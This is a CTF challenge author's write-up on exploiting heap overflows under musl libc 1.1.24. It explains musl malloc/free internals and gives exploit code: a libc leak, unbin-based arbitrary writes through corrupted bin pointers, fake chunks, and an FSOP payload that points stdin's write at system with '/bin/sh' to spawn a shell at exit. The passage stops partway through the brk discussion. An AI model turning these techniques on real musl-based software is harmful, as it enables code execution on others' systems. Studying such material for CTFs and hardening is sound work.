This article uses a CTF challenge to show how to exploit heap overflow vulnerabilities under musl libc.
0. Preface
The 2020 XCTF college anti-epidemic competition ended on March 9th. On behalf of the Xp0int team of Jinan University, I contributed a PWN challenge named musl.
The challenge focuses on heap exploitation under musl libc, mainly the implementation of the musl libc heap manager and the exploitation of heap overflow vulnerabilities. Compared with the familiar glibc, the musl libc heap manager is very simple: the core source code is less than 400 lines. As long as you read the source carefully, you can work out how to exploit the vulnerability even if you have never looked at musl libc before.
(The original name of the challenge was carbon, but for some reason it was changed to musl...)
Starting from the musl challenge, this article introduces techniques for exploiting musl libc heap vulnerabilities. It has three parts: the first explains the mistakes I made in the challenge, the second is an overview of the musl libc heap manager implementation, and the last covers the challenge analysis and the exploit.
This is my first writeup of this kind; feedback and corrections are welcome.
1. Mistakes in the challenge
This is actually the first time I have written a challenge for a public CTF competition; before this I had only written simple beginner challenges for school events. I was very careful when designing it and spent a lot of time hardening it against mistakes and unintended solutions. In the end, the top players all found an unintended solution anyway, which broke the challenge...
On review, I found two mistakes. The root cause was that the challenge was not checked carefully enough and leaked extra information to the players. Let's go through the mistakes and how to fix them.
void init()
{
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);

    LIST = mmap(0, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
    if( LIST == (struct item*)-1 ) {
        echo("ERROR: Unable to mmap\n");
        a_crash();
    }

    alarm(30);
}
Both mistakes are located in the init function (sub_400B77). The above is the source code of init, which sets up the challenge environment.
1.1 Stack address
The biggest mistake was not clearing the stack addresses stored inside the libc library.
The intended solution is to hijack program control flow via FSOP, but if a stack address can be leaked, a ROP chain can be written directly onto the stack. After the game I looked at the writeups online, and most of them got a shell this way.
pwndbg> leakfind $libc+0x292000 --page_name=stack --max_offset=0x4000 --max_depth=1
0x7ffff7ffb000+0x32f0 0x7fffffffe600 [stack]
0x7ffff7ffb000+0x31f8 0x7fffffffe390 [stack]
0x7ffff7ffb000+0x2fd8 0x7fffffffe4d8 [stack]
0x7ffff7ffb000+0x3000 0x7fffffffe765 [stack]
0x7ffff7ffb000+0x3008 0x7fffffffe770 [stack]
0x7ffff7ffb000+0x2908 0x7fffffffefe6 [stack]
The fix is straightforward. First, use pwndbg (as above) to search the BSS section of the libc library for locations that hold a stack address.
#define WRITE_GOT 0x601F98
//clear all stack addresses in libc .BSS section
uint64_t* libc_bss = (uint64_t*)(*((uint64_t*)WRITE_GOT) - 0x5a3b5 + 0x292000);
libc_bss[0x2908/8] = 0;
libc_bss[0x2fd8/8] = 0;
libc_bss[0x3000/8] = 0;
libc_bss[0x3008/8] = 0;
libc_bss[0x31f8/8] = 0;
libc_bss[0x32f0/8] = 0;
libc_bss = 0;
Then clear them one by one in the init function.
1.2 mmap
The other mistake is a misuse of the mmap function, which leaks the address of LIST.
//void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset);
LIST = mmap(0, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
The problem is the addr parameter. When addr is 0, mmap picks a vacant area in the program's address space and returns the starting address of that area to the caller, but this address is not random.
In gdb it can be seen that the LIST mapping sits right next to the libc library, at a fixed offset of 0x28c000 from the libc base address (which can be leaked), so the address of LIST is effectively leaked as well.
The intended solution is to hijack the bin linked list so that malloc returns an arbitrary pointer, achieving an arbitrary address write. However, if the LIST address is known, the pointers stored in LIST can simply be overwritten by hijacking LIST directly.
//generate a 40-bit random address
uint64_t addr = 0;
int fd = open("/dev/urandom", O_RDONLY);
if( read(fd, &addr, 5) < 0 )
    a_crash();
close(fd);
addr &= ~0xFFF;

LIST = mmap((void*)addr, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if( LIST != (struct item*)addr ) {
    echo("ERROR: Unable to mmap\n");
    a_crash();
}
addr = 0;
The fix is to generate a random 40-bit address from /dev/urandom and pass it to mmap as the addr parameter. The program cannot enable PIE, because enabling PIE would break the 0xbadbeef bypass used in the intended solution.
After the fix, LIST lies at a random address.
void init()
{
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
//generate a 40-bit random address
uint64_t addr = 0;
int fd = open("/dev/urandom", O_RDONLY);
if( read(fd, &addr, 5) < 0 )
a_crash();
close(fd);
addr &= ~0xFFF;
LIST = mmap((void*)addr, sizeof(struct item) * MAX_LIST, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if( LIST != (struct item*)addr ) {
echo("ERROR: Unable to mmap\n");
a_crash();
}
addr = 0;
#define WRITE_GOT 0x601F98
//clear all stack addresses in libc .BSS section
uint64_t* libc_bss = (uint64_t*)(*((uint64_t*)WRITE_GOT) - 0x5a3b5 + 0x292000);
libc_bss[0x2908/8] = 0;
libc_bss[0x2fd8/8] = 0;
libc_bss[0x3000/8] = 0;
libc_bss[0x3008/8] = 0;
libc_bss[0x31f8/8] = 0;
libc_bss[0x32f0/8] = 0;
libc_bss = 0;
alarm(30);
}
The above is the source code of the repaired init function.
2. Overview of musl libc heap manager
musl libc is a lightweight libc library specially developed for embedded systems, featuring simplicity, light weight and high efficiency. There are many Linux distributions that set it as the default libc library to replace the bloated glibc, such as Alpine Linux (you should be familiar with Docker images), OpenWrt (usually used in routers), and Gentoo.
Due to space constraints, I will only cover the differences between the musl libc heap manager and glibc, some data structures, the implementation of malloc and free, and static heap memory. The version of musl libc used in this article is v1.1.24.
In principle, this memory allocator is roughly equivalent to Doug
Lea's dlmalloc with fine-grained locking.
malloc:
Uses a freelist binned by chunk size, with a bitmap to optimize
searching for the smallest non-empty bin which can satisfy an
allocation. If no free chunks are available, it creates a new chunk of
the requested size and attempts to merge it with any existing free
chunk immediately below the newly created chunk.
Whether the chunk was obtained from a bin or newly created, it's
likely to be larger than the requested allocation. malloc always
finishes its work by passing the new chunk to realloc, which will
split it into two chunks and free the tail portion.
According to the design document, the musl libc heap manager is roughly equivalent to dlmalloc (the predecessor of ptmalloc2, the glibc heap manager), so parts such as chunks and unbin are very similar to glibc.
The big difference from glibc is the design of the bins. In musl libc the bins consist of 64 circular doubly linked lists with a structure similar to glibc's small bins, plus a bitmap that records which lists are non-empty. The lists are maintained FIFO style: chunks are removed from the head of the list and inserted at the tail. Each bin holds a different range of chunk sizes: the smallest bins hold a single chunk size, while the largest can hold up to 1024 different sizes.
musl libc does not implement hook functions such as __malloc_hook and __free_hook, so program control flow cannot be hijacked directly through the heap. In addition, on 64-bit systems chunk sizes are aligned to 32 bytes, unlike glibc's 16-byte alignment, so the minimum chunk size is 0x20 bytes, followed by 0x40, 0x60, 0x80, and so on.
For performance reasons, the musl libc heap manager omits many security checks, especially the validity check of chunk pointers, so the heap vulnerabilities of musl libc are easy to exploit.
The source code of malloc and free is located in src/malloc/malloc.c, and some structures and macro definitions are in src/internal/malloc_impl.h.
2.1 Data structure
struct chunk {
    size_t psize, csize; //correspond to glibc's prev_size and size fields
    struct chunk *next, *prev;
};
The chunk header structure is similar to glibc's, but there are no nextsize pointers, and the psize field is not shared between adjacent chunks.
Both the psize and csize fields carry flag bits (glibc only has them in the size field), but there is only a single flag, INUSE, in the lowest bit (glibc uses the lowest three bits). If the INUSE flag of csize is set (the lowest bit is 1), the chunk is in use; if it is clear (the lowest bit is 0), the chunk has either been freed or was allocated by mmap, and the flag bit of psize is needed to further distinguish the two states.
static struct {
volatile uint64_t binmap;
struct bin bins[64];
volatile int free_lock[2];
} mal;
The mal structure is similar to glibc's arena: it records the state of the heap and has three members, a 64-bit unsigned integer binmap, an array of list heads bins, and a lock free_lock. binmap records whether each bin is non-empty: if a bit is 1, the corresponding bin is non-empty, i.e. there are chunks in its list.
struct bin {
volatile int lock[2];
struct chunk *head;
struct chunk *tail;
};
The structure of a bin list head is shown above. The head and tail pointers point to the first and last chunks respectively, while the prev pointer of the head chunk and the next pointer of the tail chunk point back at the list head, forming a circular list. When the list is empty, head and tail are either 0 or point at the list head itself.
| bin index i | Chunk sizes per bin | Chunk size range | Relation between index i and chunk size range |
|---|---|---|---|
| 0-31 | 1 | 0x20 ~ 0x400 | (i+1) * 0x20 |
| 32-35 | 8 | 0x420 ~ 0x800 | (0x420+(i-32)\*0x100) ~ (0x500+(i-32)\*0x100) |
| 36-39 | 16 | 0x820 ~ 0x1000 | (0x820+(i-36)\*0x200) ~ (0x1000+(i-36)\*0x200) |
| 40-43 | 32 | 0x1020 ~ 0x2000 | (0x1020+(i-40)\*0x400) ~ (0x1400+(i-40)\*0x400) |
| 44-47 | 64 | 0x2020 ~ 0x4000 | (0x2020+(i-44)\*0x800) ~ (0x2800+(i-44)\*0x800) |
| 48-51 | 128 | 0x4020 ~ 0x8000 | (0x4020+(i-48)\*0x1000) ~ (0x5000+(i-48)\*0x1000) |
| 52-55 | 256 | 0x8020 ~ 0x10000 | (0x8020+(i-52)\*0x2000) ~ (0xa000+(i-52)\*0x2000) |
| 56-59 | 512 | 0x10020 ~ 0x20000 | (0x10020+(i-56)\*0x4000) ~ (0x14000+(i-56)\*0x4000) |
| 60-62 | 1024 | 0x20020 ~ 0x38000 | (0x20020+(i-60)\*0x8000) ~ (0x28000+(i-60)\*0x8000) |
| 63 | unlimited | 0x38000 and above | 0x38000 ~ |
The above shows the chunk size range of each bin, which can be deduced from the bin_index_up function in the source code. The first 32 bins are similar to fastbins and small bins: each corresponds to a single chunk size. The last 32 bins are similar to large bins: each corresponds to multiple chunk sizes.
For example, bin index 34 covers chunk sizes from 0x620 to 0x700, that is 0x620, 0x640, 0x660, 0x680, 0x6a0, 0x6c0, 0x6e0 and 0x700, a total of 8 sizes.
2.2 malloc implementation
//src/malloc/malloc.c L284-L331
void *malloc(size_t n)
{
    struct chunk *c;
    int i, j;

    //1. adjust n: add OVERHEAD (0x10) and round up to 32 bytes
    //*n = (*n + OVERHEAD + SIZE_ALIGN - 1) & SIZE_MASK;
    if (adjust_size(&n) < 0) return 0;

    //if n > MMAP_THRESHOLD (0x38000), create an mmap chunk
    if (n > MMAP_THRESHOLD) {
        [...]
        return CHUNK_TO_MEM(c);
    }

    //2. compute the bin index i corresponding to n
    i = bin_index_up(n);
    for (;;) {
        //3. look in binmap for non-empty bins with index >= i
        uint64_t mask = mal.binmap & -(1ULL<<i);
        //if all usable bins are empty, call expand_heap to create a new chunk
        if (!mask) {
            c = expand_heap(n);
            [...]
            break;
        }
        //4. select the non-empty bin j closest in size to n
        j = first_set(mask);
        lock_bin(j);
        c = mal.bins[j].head; //c is the first chunk of bin j
        //5. if the pretrim conditions hold, split c in place; otherwise unbin c
        if (c != BIN_TO_CHUNK(j)) {
            if (!pretrim(c, n, i, j)) unbin(c, j);
            unlock_bin(j);
            break;
        }
        unlock_bin(j);
    }
    //6. trim c down to n bytes
    /* Now patch up in case we over-allocated */
    trim(c, n);
    return CHUNK_TO_MEM(c);
}
The implementation of malloc is very simple: the main steps are to select a bin via binmap and then take the chunk at the head of that bin's list. Neither the list nor the chunk header is validated while the chunk is being removed.
Detailed steps of malloc:

- Adjust n: add the header overhead and align to 32 bytes.
- If n > MMAP_THRESHOLD, use mmap to create a memory region of size n and return it to the user.
- If n <= MMAP_THRESHOLD, compute the bin index i corresponding to n and check binmap:
  - If all usable bins are empty, extend the heap space and create a new chunk.
  - If a usable non-empty bin exists, select the bin j whose size is closest to n and take the chunk c at the head of its list:
    - If the pretrim conditions are met, split c with pretrim.
    - Otherwise, remove c from the list with unbin.
- Finally, the chunk is processed with trim and returned to the user.
Next, a brief look at unbin, pretrim and trim.
//src/malloc/malloc.c L188-L213
static void unbin(struct chunk *c, int i)
{
    //if c is the only chunk in the bin, mark bin i as empty in binmap
    if (c->prev == c->next)
        a_and_64(&mal.binmap, ~(1ULL<<i));
    //remove the chunk from the doubly linked list
    c->prev->next = c->next;
    c->next->prev = c->prev;
    //set the INUSE flag on this chunk and on the next chunk's psize
    c->csize |= C_INUSE;
    NEXT_CHUNK(c)->psize |= C_INUSE;
}
unbin is the equivalent of glibc's unlink: it removes a chunk from a bin's doubly linked list. During removal, unbin does not check whether the chunk's pointers are legal.
//src/malloc/malloc.c L233-L264
/* pretrim - trims a chunk _prior_ to removing it from its bin.
 * Must be called with i as the ideal bin for size n, j the bin
 * for the _free_ chunk self, and bin j locked. */
static int pretrim(struct chunk *self, size_t n, int i, int j)
{
    size_t n1;
    struct chunk *next, *split;

    //condition 1: the bin index j must be at least 40
    /* We cannot pretrim if it would require re-binning. */
    if (j < 40) return 0;
    //condition 2: j must be at least 3 bins above the ideal bin i,
    //unless j is 63 and the remainder after splitting exceeds MMAP_THRESHOLD
    if (j < i+3) {
        if (j != 63) return 0;
        n1 = CHUNK_SIZE(self);
        if (n1-n <= MMAP_THRESHOLD) return 0;
    } else {
        n1 = CHUNK_SIZE(self);
    }
    //condition 3: the remainder (n1-n) must still belong to bin j,
    //so that split can replace self in the same bin
    if (bin_index(n1-n) != j) return 0;

    //cut self down to n bytes; split (the remainder) takes self's place in the list
    next = NEXT_CHUNK(self);
    split = (void *)((char *)self + n);

    split->prev = self->prev;
    split->next = self->next;
    split->prev->next = split;
    split->next->prev = split;
    split->psize = n | C_INUSE;
    split->csize = n1-n;
    next->psize = n1-n;
    self->csize = n | C_INUSE;
    return 1;
}
pretrim cuts down large chunks to prevent a chunk far larger than the request from being handed to the user. When its conditions are met, pretrim carves a chunk of exactly the required size off the head chunk of the bin list and gives it to the user, while the remainder stays in place as the new head chunk of the list.
//src/malloc/malloc.c L266-L282
static void trim(struct chunk *self, size_t n)
{
    size_t n1 = CHUNK_SIZE(self);
    struct chunk *next, *split;

    //do nothing if the excess (n1 - n) is at most DONTCARE (0x10)
    if (n >= n1 - DONTCARE) return;

    //cut off everything past the first n bytes of self as a new chunk split
    next = NEXT_CHUNK(self);
    split = (void *)((char *)self + n);

    split->psize = n | C_INUSE;
    split->csize = n1-n | C_INUSE;
    next->psize = n1-n | C_INUSE;
    self->csize = n | C_INUSE;

    //free split into a bin
    __bin_chunk(split);
}
The last step of malloc is trim, whose job is to reclaim the part of a chunk that exceeds the requested size: trim cuts off the excess and frees it into a bin, reducing memory waste.
2.3 free implementation
//src/malloc/malloc.c L519-L529
void free(void *p)
{
    if (!p) return;

    struct chunk *self = MEM_TO_CHUNK(p);
    //if csize's INUSE flag is clear, treat the chunk as mmap-allocated
    //(or a potential double free)
    //#define IS_MMAPPED(c) !((c)->csize & (C_INUSE))
    if (IS_MMAPPED(self))
        unmap_chunk(self);
    else
        __bin_chunk(self);
}
//src/malloc/malloc.c L509-L517
static void unmap_chunk(struct chunk *self)
{
    size_t extra = self->psize;
    char *base = (char *)self - extra;
    size_t len = CHUNK_SIZE(self) + extra;
    //psize with the INUSE flag set means a double free: crash
    /* Crash on double free */
    if (extra & 1) a_crash();
    __munmap(base, len);
}
free first checks the chunk for mmap allocation and double frees. If the INUSE flag of the chunk's csize field is clear, free enters unmap_chunk and checks the psize field: if the INUSE flag is set in psize, the chunk is treated as a double free and the process crashes; otherwise it is treated as an mmap chunk and released by calling __munmap.
//src/malloc/malloc.c L440-L507
void __bin_chunk(struct chunk *self)
{
    struct chunk *next = NEXT_CHUNK(self);
    size_t final_size, new_size, size;
    int reclaim=0;
    int i;

    //new_size: self's own size; final_size: size after merging neighbors
    final_size = new_size = CHUNK_SIZE(self);

    /* Crash on corrupted footer (likely from buffer overflow) */
    if (next->psize != self->csize) a_crash();

    //1. merge self with adjacent free chunks
    for (;;) {
        if (self->psize & next->csize & C_INUSE) {
            //neither neighbor is free: temporarily mark self in use
            self->csize = final_size | C_INUSE;
            next->psize = final_size | C_INUSE;
            //compute the bin index i for final_size
            i = bin_index(final_size);
            lock_bin(i);
            lock(mal.free_lock);
            if (self->psize & next->csize & C_INUSE)
                break; //still no free neighbors after locking: done merging
            unlock(mal.free_lock);
            unlock_bin(i);
        }
        //merge backward with a free previous chunk
        if (alloc_rev(self)) { //alloc_rev removes the previous chunk from its bin
            self = PREV_CHUNK(self);
            size = CHUNK_SIZE(self);
            final_size += size;
            if (new_size+size > RECLAIM && (new_size+size^size) > size)
                reclaim = 1;
        }
        //merge forward with a free next chunk
        if (alloc_fwd(next)) { //alloc_fwd removes the next chunk from its bin
            size = CHUNK_SIZE(next);
            final_size += size;
            if (new_size+size > RECLAIM && (new_size+size^size) > size)
                reclaim = 1;
            next = NEXT_CHUNK(next);
        }
    }
    //2. mark bin i as non-empty in binmap
    if (!(mal.binmap & 1ULL<<i))
        a_or_64(&mal.binmap, 1ULL<<i);

    self->csize = final_size;
    next->psize = final_size;
    unlock(mal.free_lock);

    //3. insert self at the tail of bin i's list
    self->next = BIN_TO_CHUNK(i);
    self->prev = mal.bins[i].tail;
    self->next->prev = self;
    self->prev->next = self;

    /* Replace middle of large chunks with fresh zero pages */
    if (reclaim) {
        [...]
    }

    unlock_bin(i);
}
__bin_chunk inserts a chunk into a bin list. It first merges the chunk with any adjacent free chunks, updates binmap and the chunk flags, and finally inserts the chunk into the corresponding bin list.
2.4 Static heap memory
In glibc, the heap generally lives in a dynamic memory region. To reduce memory overhead, the musl libc heap manager also carves heap memory out of the free (static) memory of the program and the libc library itself, and prefers this static heap memory when allocating chunks. Only when static heap memory is exhausted or cannot satisfy a request does musl libc ask for dynamic memory.
Next, let's look at how musl libc implements this feature.
void __dls3(size_t *sp)
{
[...]
//ldso/dynlink.c L1839-L1840
/* Donate unused parts of app and library mapping to malloc */
reclaim_gaps(&app);
reclaim_gaps(&ldso);
[...]
}
During initialization, musl libc calls reclaim_gaps to find the free memory of the program and the libc library and release it into the bins.
//ldso/dynlink.c L526-L552
/* A huge hack: to make up for the wastefulness of shared libraries
 * needing at least a page of dirty memory even if they have no global
 * data, we reclaim the gaps at the beginning and end of writable maps
 * and "donate" them to the heap. */
static void reclaim(struct dso *dso, size_t start, size_t end)
{
    //skip the RELRO region, which becomes read-only after relocation
    if (start >= dso->relro_start && start < dso->relro_end) start = dso->relro_end;
    if (end >= dso->relro_start && end < dso->relro_end) end = dso->relro_start;
    if (start >= end) return;
    char *base = laddr_pg(dso, start);
    //__malloc_donate releases the region into a bin
    __malloc_donate(base, base+(end-start));
}

static void reclaim_gaps(struct dso *dso)
{
    Phdr *ph = dso->phdr;
    size_t phcnt = dso->phnum;
    //iterate over the program headers
    for (; phcnt--; ph=(void *)((char *)ph+dso->phentsize)) {
        //condition 1: must be a PT_LOAD segment
        if (ph->p_type!=PT_LOAD) continue;
        //condition 2: must be readable and writable
        if ((ph->p_flags&(PF_R|PF_W))!=(PF_R|PF_W)) continue;
        //reclaim the gaps between the segment and its enclosing page boundaries
        reclaim(dso, ph->p_vaddr & -PAGE_SIZE, ph->p_vaddr);
        reclaim(dso, ph->p_vaddr+ph->p_memsz,
            ph->p_vaddr+ph->p_memsz+PAGE_SIZE-1 & -PAGE_SIZE);
    }
}
reclaim_gaps iterates over the memory segments; for each qualifying segment it computes the unused gaps between the segment boundaries and the enclosing page boundaries, and passes those gap regions to reclaim, which finally releases them into the bins via __malloc_donate.
After musl libc finishes initializing, gdb shows two chunks in the bins whose memory happens to lie inside the libc library and the program respectively. malloc can use trim or pretrim to cut these two chunks into multiple chunks and hand them to the user.
This feature helps with information leaks during exploitation: if a chunk address is known, it is equivalent to leaking the libc base address or the program base address; conversely, if the libc or program base address can be leaked, the address of any such chunk can be computed.
3. Topic analysis
Challenge source code: github.com/xf1les/XCTF...
Run build.sh in the source directory to compile the libc library and the carbon binary with debugging information.
root@4124cf40a89b:/pwn/Debug# ./libc.so
musl libc (x86_64)
Version 1.1.24
Dynamic Program Loader
Usage: ./libc.so [options] [--] pathname [args]
root@4124cf40a89b:/pwn/Debug# checksec carbon
[*] '/pwn/Debug/carbon'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
The binary enables every protection mechanism except PIE, and the musl libc version is 1.1.24.
1) Assign sleeves
2) Destory sleeves
3) Transform sleeves
4) Examine sleeves
5) Real death
>
A typical menu challenge: you can add, delete, edit and display heap chunks. The following points deserve attention:
- add allows a single heap overflow, with an overflow length of up to 0x50 bytes.
- There is only one call to the exit function: when the pointer returned by malloc is 0xbadbeef.
- The display (view) function can only be used once.
4. Vulnerability Exploitation
Exploitation has three main steps: first, leak the libc base address; second, overwrite the pointer fields of the chunk at the head of a bin list via the heap overflow and use unbin to gain arbitrary address writes; third, lay out the FSOP payload, fix up the allocator's internal variables, and trigger the FSOP through the exit function to get a shell.
4.1 Leaking libc base address
Allocate a chunk smaller than 0x400 bytes: its first 8 bytes still hold the address of the bin list head left behind by unbin. Reading it with the one-shot view leaks the libc base address.
add(0x1, 'A') #0
libc_base = u64(view(0).ljust(8, '\x00')) - 0x292e41 # bin[0]
For a chunk of size 0x20, the leaked value points into the mal.bins[0] list head (located at mal+832), whose offset from the libc base address is 0x292e00.
4.2 Use unbin to achieve arbitrary address writing
unbin does not check whether the prev and next pointers are legal. We can overwrite these two pointers through the heap overflow and use unbin to write a pointer value to an arbitrary address, since unbin performs c->prev->next = c->next (a write at prev+0x10) and c->next->prev = c->prev (a write at next+0x18).
As shown in the figure, mal.bins[38] is a non-empty bin. We can build a fake chunk near the memory block we want to control, use unbin to write the fake chunk address into the mal.bins[38]->head pointer, and then make malloc return the fake chunk by hijacking the bin list, achieving an arbitrary address write.
4.2.1 Hijacking the bin list
add(0x10, 'A'*0x10) #1
add(0x10, 'B'*0x10) #2, prevent consolidation
add(0x10, 'C'*0x10) #3
add(0x10, 'D'*0x10) #4, prevent consolidation
free(1)
free(3)
First allocate 4 chunks of 0x20 bytes each, then free chunk 1 and chunk 3. The freed chunks enter the mal.bins[0] list, and the mal.bins[0]->head pointer points to chunk 1.
bin = libc_base + 0x292e40 # mal.bins[38]->head
next = bin - 0x10
prev = fake_chunk
payload = 'X' * 0x10
payload += p64(0x21) * 2 + 'X' * 0x10
payload += p64(0x21) + p64(0x20) + p64(next) + p64(prev)
payload += p8(0x20)
payload += '\n'
add(0x10, payload, 'Y') #1, heap overflow
Then allocate one 0x20-byte chunk: malloc takes chunk 1 (pointed to by the mal.bins[0]->head pointer) out of the bin and updates head to point to chunk 3. The allocation overflows from chunk 1 into chunk 3, overwriting chunk 3's next pointer with an address derived from the mal.bins[38]->head pointer and its prev pointer with the fake chunk address.
add(0x10) # 3, unbin #1
When another 0x20-byte chunk is allocated, malloc unbins chunk 3, and the unbin writes place the fake chunk address into the mal.bins[38]->head pointer.
add(0x50) # 5, fake chunk
Finally, a 0x60-byte chunk is allocated: malloc takes the fake chunk out of mal.bins[38] and returns its address.
edit(3, p64(next) + p64(prev2))
add(0x10) # 3, unbin #2
add(0x50) # 5, fake_chunk #2
edit(3, p64(next) + p64(prev3))
add(0x10) # 3, unbin #3
add(0x50) # 6, fake_chunk #3
edit(3, p64(next) + p64(prev4))
add(0x10) # 3, unbin #4
add(0x50) # 7, fake_chunk #4
edit(3, p64(next) + p64(prev5))
add(0x10) # 3, unbin #5
add(0x50) # 8, fake_chunk #5
[......]
Since the mal.bins[0] list has been corrupted, the mal.bins[0]->head pointer is no longer updated and keeps pointing to chunk 3. By repeatedly editing chunk 3's prev pointer, we can perform arbitrary address writes any number of times.
4.2.2 Construct fake chunk
Since malloc does not check the chunk header, a fake chunk can be taken out of a bin list through unbin as long as its prev and next pointers refer to legal addresses, that is, the values at fake_chunk+0x10 and fake_chunk+0x18 are writable memory addresses.
In addition to using existing fake chunks, we can also use unbin to construct fake chunks on any memory block:
fake_chunk = target - 0x10
edit(3, p64(fake_chunk) + p64(fake_chunk))
add(0x10) # 3, unbin
Assume the address of the memory block we want to control is target. Set both the prev and next pointers of chunk 3 to fake_chunk = target - 0x10, then trigger unbin.
Before unbin.
After unbin, the fake chunk's prev and next fields have both been overwritten with the fake chunk's own address, which happens to satisfy the construction conditions.
free(n) # n: any in-use 0x20-byte chunk
Then free any chunk of 0x20 bytes.
//src/malloc/malloc.c L188-L191
static void unbin(struct chunk *c, int i)
{
if (c->prev == c->next)
a_and_64(&mal.binmap, ~(1ULL<<i));
[...]
}
void __bin_chunk(struct chunk *self)
{
[...]
//src/malloc/malloc.c L482-L483
if (!(mal.binmap & 1ULL<<i))
a_or_64(&mal.binmap, 1ULL<<i);
[...]
}
This is because when the prev and next pointers are equal, unbin clears the bin's bit in binmap, marking mal.bins[0] as empty and thus unusable. Freeing any 0x20-byte chunk resets mal.bins[0] to non-empty.
Note that there must be no free chunks adjacent to the chunk being freed, otherwise free will merge it and the chunk will end up in a different bin.
edit(3, p64(bin - 0x10) + p64(fake_chunk))
add(0x10) # 3, unbin
add(0x50) # n+1, target
Finally, use unbin once more to write the fake_chunk address into the mal.bins[38]->head pointer, and allocate the fake chunk to take control of target.
4.3 FSOP
After leaking the libc base address and achieving arbitrary address writes, the next step is to hijack program control flow to get a shell. musl libc has no hook function like __malloc_hook that makes control-flow hijacking easy; the only practical method at present (leaving aside the unintended solution mentioned above) is FSOP: overwriting a function pointer in a FILE structure.
pwndbg> ptype stdin
type = struct _IO_FILE {
unsigned int flags;
unsigned char *rpos;
unsigned char *rend;
int (*close)(FILE *);
unsigned char *wend;
unsigned char *wpos;
unsigned char *mustbezero_1;
unsigned char *wbase;
size_t (*read)(FILE *, unsigned char *, size_t);
size_t (*write)(FILE *, const unsigned char *, size_t);
off_t (*seek)(FILE *, off_t, int);
unsigned char *buf;
size_t buf_size;
FILE *prev;
FILE *next;
int fd;
int pipe_pid;
long lockcount;
int mode;
volatile int lock;
int lbf;
void *cookie;
off_t off;
char *getln_buf;
void *mustbezero_2;
unsigned char *shend;
off_t shlim;
off_t shcnt;
FILE *prev_locked;
FILE *next_locked;
struct __locale_struct *locale;
} * const
pwndbg> vmmap stdin
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
0x7ffff7ffb000 0x7ffff7ffc000 rw-p 1000 92000 /pwn/Debug/libc.so
pwndbg>
The above is the definition of the _IO_FILE structure. musl's _IO_FILE has no vtable; there are only four function pointers (close, read, write and seek) located at various offsets within the structure. Since the memory holding the stdin, stdout and stderr structures is writable, we can overwrite them using the arbitrary address write.
//sub_400E07
p = (char *)malloc(size);
if ( p == (char *)0xBADBEEF )
{
sub_400AEC("ERROR: Bad beefn");
exit(-1);
}
The program calls the exit function in exactly one place.
//src/exit/exit.c L27-L33
_Noreturn void exit(int code)
{
__funcs_on_exit();
__libc_exit_fini();
__stdio_exit(); <---
_Exit(code);
}
//src/stdio/__stdio_exit.c L16-L23
void __stdio_exit(void)
{
FILE *f;
for (f=*__ofl_lock(); f; f=f->next) close_file(f);
close_file(__stdin_used); <---
close_file(__stdout_used);
close_file(__stderr_used);
}
//src/stdio/__stdio_exit.c L8-L14
static void close_file(FILE *f)
{
if (!f) return;
FFINALLOCK(f);
if (f->wpos != f->wbase) f->write(f, 0, 0); <---
if (f->rpos != f->rend) f->seek(f, f->rpos-f->rend, SEEK_CUR);
}
Reading the source, exit eventually calls __stdio_exit to close all open file streams. In close_file, if the file stream f satisfies f->wpos != f->wbase, the write function pointer in f's FILE structure is called: f->write(f, 0, 0).
payload = "/bin/sh\x00" # stdin->flags
payload += 'X' * 32
payload += p64(0xdeadbeef) # stdin->wpos
payload += 'X' * 8
payload += p64(0xbeefdead) # stdin->wbase
payload += 'X' * 8
payload += p64(system) # stdin->write
edit(stdin, payload)
The conditions for triggering the FSOP are simple: write /bin/sh\x00 into the first 8 bytes of the stdin structure, point the write pointer at the system function, make stdin->wpos != stdin->wbase, and finally call the exit function to get a shell.
Besides exit, similar FSOP trigger points exist in standard I/O functions such as scanf, printf and puts. If you are interested, read the source of those functions yourself.
4.4 Return 0xBADBEEF
To reach that exit call, however, the address returned by malloc must be 0xBADBEEF, which is obviously not a valid memory address. By modifying a global variable named brk inside libc, we can both make 0xBADBEEF a normally accessible address and make malloc return it.
//src/malloc/malloc.c L303-L315
void *malloc(size_t n)
{
    [...]
    for (;;) {
        uint64_t mask = mal.binmap & -(1ULL<<i);
        //all usable bins are empty: call expand_heap to create a new chunk
        if (!mask) {
            c = expand_heap(n);
            if (!c) return 0;
            //merge the new chunk with a free chunk immediately below it
            if (alloc_rev(c)) {
                struct chunk *x = c;
                c = PREV_CHUNK(c);
                NEXT_CHUNK(x)->psize = c->csize =
                    x->csize + CHUNK_SIZE(c);
            }
            break;
        }
        [...]
    }
When all usable bins are empty, malloc calls expand_heap to extend the heap memory space and create a new chunk. expand_heap in turn calls the __expand_heap function.
//src/malloc/expand_heap.c L39-L61
void *__expand_heap(size_t *pn)
{
    static uintptr_t brk; //the saved program break
    static unsigned mmap_step;
    size_t n = *pn; //n: the requested chunk size

    //fail if n exceeds SIZE_MAX/2 - PAGE_SIZE (0x7FFFFFFFFFFFEFFF)
    if (n > SIZE_MAX/2 - PAGE_SIZE) {
        errno = ENOMEM;
        return 0;
    }
    n += -n & PAGE_SIZE-1;

    //on the first call (brk still 0), query the current program break
    if (!brk) {
        brk = __syscall(SYS_brk, 0);
        brk += -brk & PAGE_SIZE-1;
    }

    //extend the data segment from brk to brk+n via the brk syscall,
    //then return the old brk and advance the saved pointer
    if (n < SIZE_MAX-brk && !traverses_stack_p(brk, brk+n)
        && __syscall(SYS_brk, brk+n)==brk+n) { <---
        *pn = n;
        brk += n;
        return (void *)(brk-n);
    }

    //if brk fails, fall back to mmap
    [...]
}
